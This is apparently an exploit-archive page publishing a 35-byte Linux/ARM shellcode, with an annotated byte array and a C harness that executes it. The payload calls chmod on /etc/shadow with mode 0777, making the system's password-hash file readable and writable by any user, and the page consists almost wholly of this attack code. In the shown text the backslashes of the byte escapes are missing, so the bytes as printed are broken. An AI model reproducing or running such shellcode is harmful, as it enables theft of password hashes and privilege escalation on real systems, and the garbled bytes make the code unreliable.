[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux/ARM chmod("/etc/shadow", 0777) Shellcode 35 Bytes
# Published : 2010-06-29
# Author :
# Previous Title : DNS Reverse Download and Exec Shellcode
# Next Title : Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes


/*
| Title: Linux/ARM chmod("/etc/shadow", 0777) Shellcode 35 Bytes
| Type: Shellcode
| Author: Florian Gaultier <florian.gaultier@shell-storm.org>
| Platform: Linux ARM (ARM926EJ-S rev 5 (v51))
| [+] http://www.shell-storm.org
*/

#include <stdio.h>


char shellcode[] = "x01x60x8fxe2" // add r6, pc, #1
"x16xffx2fxe1" // bx r6
"x78x46" // mov r0, pc
"x0cx30" // adds r0, #12
"xffx21" // movs r1, #255
"xffx31" // adds r1, #255
"x0fx27" // movs r7, #15
"x01xdf" // svc 1
"x01x27" // movs r7, #1
"x01xdf" // svc 1
"/etc/shadow";

int main()
{
(*(void(*)()) shellcode)();

return 0;
}